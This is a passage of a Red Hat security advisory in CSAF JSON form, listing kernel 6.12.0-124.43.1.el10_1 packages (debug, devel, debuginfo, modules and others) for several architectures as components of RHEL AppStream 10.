"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
